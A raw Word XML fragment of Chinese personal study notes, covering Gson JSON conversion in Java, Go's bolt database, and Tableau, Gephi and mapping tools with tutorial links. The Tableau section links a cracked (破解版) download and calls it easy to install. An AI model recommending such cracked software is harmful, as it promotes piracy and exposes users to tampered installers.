      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> Student student =new Student();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6B5FD2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> student.setName("</w:t>
      </w:r>
      <w:r>
        <w:t>王梦雪</w:t>
      </w:r>
      <w:r>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3547DFB2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> student.setAge(11);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215D896E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> student.setSex("</w:t>
      </w:r>
      <w:r>
        <w:t>女</w:t>
      </w:r>
      <w:r>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6E0BAB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> student.setSalary(1000.3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C25645" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Gson gson=new Gson();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7462EA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>把</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>对象转成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0203A0A6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">String string= gson.toJson(student).toString(); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6036BAAC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> System.out.println(string);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA4456F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
      <w:r>
        <w:t>把</w:t>
      </w:r>
      <w:r>
        <w:t>json</w:t>
      </w:r>
      <w:r>
        <w:t>转为</w:t>
      </w:r>
      <w:r>
        <w:t>java</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0881D9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Student student2= gson.fromJson(string, Student.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346A4975" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> System.out.println(student2.toString());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C90EF6F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3E5EAD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66C2D54F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B7E15F5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="776" w:name="_Toc159780199"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>golang bolt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库</w:t>
      </w:r>
      <w:bookmarkEnd w:id="776"/>
    </w:p>
    <w:p w14:paraId="0F1D452E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>学习链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: http://zjykzk.github.io/posts/cs/db/bolt/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F39BC6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CABDF42" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bucket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之间是可以互相嵌套的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A0C934" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B53D51D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A2391E0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71A01E21" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="777" w:name="_Toc159780200"/>
      <w:r>
        <w:t>数据可视化：数据或地图</w:t>
      </w:r>
      <w:bookmarkEnd w:id="777"/>
    </w:p>
    <w:p w14:paraId="26B0DD70" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A2BD87E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="778" w:name="_Toc159780201"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tableau</w:t>
      </w:r>
      <w:bookmarkEnd w:id="778"/>
    </w:p>
    <w:p w14:paraId="2F1D4C91" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="120F14A5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2021</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>破解版下载地址：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://blog.51cto.com/u_15298458/5342530</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6797B9BB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>按照链接教程很好安装破解版，安装后大概</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1G</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>多一些</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BD3930" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7047C2BF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>学习链接：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://www.w3cschool.cn/tableau/tableau_bubble_chart.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C071133" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="062B9617" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我使用效果如图：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5129AB8C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="3B5A70AD" wp14:editId="17A18201">
            <wp:extent cx="4208780" cy="2451735"/>
            <wp:effectExtent l="0" t="0" r="12700" b="190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258"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4208780" cy="2451735"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A706BB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10BA0ADB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>导出图像的话，参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: https://www.zhihu.com/question/266306247</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3F1BA5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>需要先把“工作表”导入“仪表盘”或者“故事”，然后点击“仪表盘”选择“导出图像”。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C14699A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2623F890" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D0367F4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16B7EBF6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28E3FA8F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D1010A6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C5B7BD4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="779" w:name="_Toc159780202"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gephi</w:t>
      </w:r>
      <w:bookmarkEnd w:id="779"/>
    </w:p>
    <w:p w14:paraId="5CAA77D0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>法国佬开发的开源免费，常用来分析推特用户互相联系一类的情况</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C353E3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A75DF76" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载地址</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId259" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>https://gephi.org/users/download</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470AB451" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>教程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId260" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>https://orgmapper.com/gephi-tutorial/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="00B46A56" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>教程：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> https://gephi.org/users/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24600FBB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14482C0A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据教程内容，设置节点、添加边后，很容易生成这种散点连线图。可以输出为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.gephi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的项目文件，也可以输出为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>png</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pdf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCE35F7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14F91B03" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>git</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>项目，可以引入自己的代码种，直接由代码完成绘画等操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338E0EDB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BDCB1B3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>界面如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9A02D3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="2A051C15" wp14:editId="2113228E">
            <wp:extent cx="4333875" cy="2397125"/>
            <wp:effectExtent l="0" t="0" r="9525" b="1079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261"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4333875" cy="2397125"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6B0BFB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24B75FEC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gephi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://pypi.org/project/GephiStreamer/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E79C01" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获知该库来源：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35589FD7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://stackoverflow.com/questions/35936991/how-to-create-gephi-network-graphs-from-python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F8CDE7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AFFE5BF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="661D8728" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15D70145" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74587194" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="780" w:name="_Toc159780203"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:bookmarkEnd w:id="780"/>
    </w:p>
    <w:p w14:paraId="000A3FD8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="243FE55D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="424ED47D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="781" w:name="_Toc159780204"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地图绘制工具</w:t>
      </w:r>
      <w:bookmarkEnd w:id="781"/>
    </w:p>
    <w:p w14:paraId="653A8D42" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Google </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Yahoo! </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Microsoft</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地图</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124A129E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
